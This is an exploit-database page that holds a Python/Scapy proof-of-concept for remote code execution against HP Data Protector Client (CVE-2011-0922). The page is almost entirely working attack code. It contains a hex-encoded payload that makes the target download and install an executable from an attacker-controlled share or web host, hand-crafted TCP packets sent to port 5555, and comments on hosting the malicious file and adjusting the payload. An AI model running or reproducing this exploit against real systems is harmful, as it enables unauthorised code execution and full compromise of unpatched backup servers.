Home / exploits

PDF

HP Data Protector Client EXEC_SETUP Code Execution

Posted on 30 May 2011

# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: fdisk
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done.
# Tweak payload to better suit your needs.
#
# Since you're crafting packets with Scapy don't forget to use iptables to block the outbound resets or your host will
# reset your connection after receiving and unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun.
#
# Special thanks to all the Exploit-DB Dev Team.

from scapy.all import *

if len(sys.argv) != 2:
print "Usage: ./ZDI-11-056.py <Target IP>"
sys.exit(1)

target = sys.argv[1]

payload = ("x00x00x01xbe"
"xffxfex32x00x00x00x20x00x70x00x77x00x6ex00x32x00"
"x30x00x30x00x33x00x73x00x65x00x2ex00x68x00x6fx00"
"x6dx00x65x00x2ex00x69x00x74x00x00x00x20x00x30x00"
"x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00"
"x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00"
"x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00"
"x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00"
"x5cx00x70x00x77x00x6ex00x32x00x30x00x30x00x33x00"
"x53x00x45x00x2ex00x68x00x6fx00x6dx00x65x00x2ex00"
"x69x00x74x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00"
"x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00"
"x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00"
"x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00"
"x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00"
"x72x00x63x00x65x00x20x00x5cx00x5cx00x70x00x77x00"
"x6ex00x32x00x30x00x30x00x33x00x53x00x45x00x2ex00"
"x68x00x6fx00x6dx00x65x00x2ex00x69x00x74x00x5cx00"
"x4fx00x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00"
"x20x00x00x00x20x00x5cx00x5cx00x70x00x77x00x4ex00"
"x32x00x30x00x30x00x33x00x53x00x45x00x5cx00x4fx00"
"x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00"
"x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00"
"x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00"
"x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00"
"x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00"
"x5cx00x5cx00x70x00x77x00x4ex00x32x00x30x00x30x00"
"x33x00x53x00x45x00x5cx00x4fx00x6dx00x6ex00x69x00"
"x62x00x61x00x63x00x6bx00x20x00x00x00x00x00x00x00"
"x02x54"
"xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00"
"x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00"
"x41x00x44x00x45x00x0ax00x5cx00x5cx00x70x00x77x00"
"x6ex00x32x00x30x00x30x00x33x00x53x00x45x00x2ex00"
"x68x00x6fx00x6dx00x65x00x2ex00x69x00x74x00x5cx00"
"x4fx00x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00"
"x5cx00x69x00x33x00x38x00x36x00x0ax00x49x00x4ex00"
"x53x00x54x00x41x00x4cx00x4cx00x41x00x54x00x49x00"
"x4fx00x4ex00x54x00x59x00x50x00x45x00x3dx00x22x00"
"x43x00x6cx00x69x00x65x00x6ex00x74x00x22x00x20x00"
"x43x00x45x00x4cx00x4cx00x4ex00x41x00x4dx00x45x00"
"x3dx00x22x00x70x00x77x00x6ex00x32x00x30x00x30x00"
"x33x00x73x00x65x00x2ex00x68x00x6fx00x6dx00x65x00"
"x2ex00x69x00x74x00x22x00x20x00x43x00x45x00x4cx00"
"x4cx00x43x00x4cx00x49x00x45x00x4ex00x54x00x4ex00"
"x41x00x4dx00x45x00x3dx00x22x00x73x00x65x00x63x00"
"x75x00x72x00x6ex00x65x00x74x00x2dx00x62x00x32x00"
"x75x00x64x00x66x00x76x00x2ex00x68x00x6fx00x6dx00"
"x65x00x2ex00x69x00x74x00x22x00x20x00x41x00x4cx00"
"x4cx00x55x00x53x00x45x00x52x00x53x00x3dx00x35x00"
"x20x00x49x00x4ex00x53x00x54x00x41x00x4cx00x4cx00"
"x44x00x49x00x52x00x3dx00x22x00x24x00x28x00x4fx00"
"x4dx00x4ex00x49x00x42x00x41x00x43x00x4bx00x29x00"
"x5cx00x22x00x20x00x50x00x52x00x4fx00x47x00x52x00"
"x41x00x4dx00x44x00x41x00x54x00x41x00x3dx00x22x00"
"x24x00x28x00x44x00x41x00x54x00x41x00x4fx00x4dx00"
"x4ex00x49x00x42x00x41x00x43x00x4bx00x29x00x5cx00"
"x22x00x20x00x49x00x4ex00x45x00x54x00x50x00x4fx00"
"x52x00x54x00x3dx00x35x00x35x00x35x00x35x00x20x00"
"x41x00x44x00x44x00x4cx00x4fx00x43x00x41x00x4cx00"
"x3dx00x63x00x6fx00x72x00x65x00x2cx00x6ax00x61x00"
"x76x00x61x00x67x00x75x00x69x00x20x00x4fx00x50x00"
"x54x00x5fx00x44x00x4ex00x53x00x43x00x48x00x45x00"
"x43x00x4bx00x3dx00x31x00x20x00x4fx00x50x00x54x00"
"x5fx00x53x00x4bx00x49x00x50x00x49x00x4dx00x50x00"
"x4fx00x52x00x54x00x3dx00x31x00x20x00x4fx00x50x00"
"x54x00x5fx00x4dx00x53x00x47x00x3dx00x31x00x0ax00"
"x00x00x00x00")

ip=IP(dst=target)
SYN=TCP(sport=31337, dport=5555, flags="S")
packet=ip/SYN
SYNACK=sr1(packet)

my_ack = SYNACK.seq + 1
print SYNACK.seq
print my_ack
ACK=TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack)
send(ip/ACK)

PUSH=TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack)
send(ip/PUSH/payload)

 

TOP